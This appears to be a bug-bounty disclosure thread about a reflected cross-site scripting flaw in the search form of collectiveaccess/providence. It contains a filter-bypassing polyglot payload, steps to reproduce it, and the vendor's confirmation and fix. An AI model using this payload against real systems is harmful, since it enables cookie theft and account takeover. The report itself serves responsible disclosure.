Cross-site Scripting (XSS) - Reflected in collectiveaccess/providence


Reported on

Oct 25th 2021


Reflected XSS in form Search.

After report

I have retested the vulnerability and my payload is able to bypass your filter mechanism.

The input tag of the search form was escaped by my payload

<input type="text" name="search" length="15" id="caQuickSearchFormText" value="/*-/*`/*\\`/*'/*" **="" (="" *="" onclick="alert('xss')" )="" "="" onfocus="this.value='';">

Step to Reproduct

Login to Panel

At Search input with payload: /*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert('xss') )//

The XSS will trigger when clicking to form search again


This vulnerability has the potential to steal a user's cookie and gain unauthorized access to that user's account through the stolen cookie.

We have contacted a member of the collectiveaccess/providence team and are waiting to hear back 2 years ago
2 years ago


Thanks for catching this! That error was staring us in the face for a good long while We've patched it now.

CollectiveAccess validated this vulnerability 2 years ago
lethanhphuc has been awarded the disclosure bounty
The fix bounty is now up for grabs
CollectiveAccess marked this as fixed with commit 6c1f6a 2 years ago
CollectiveAccess has been awarded the fix bounty
This vulnerability will not receive a CVE
to join this conversation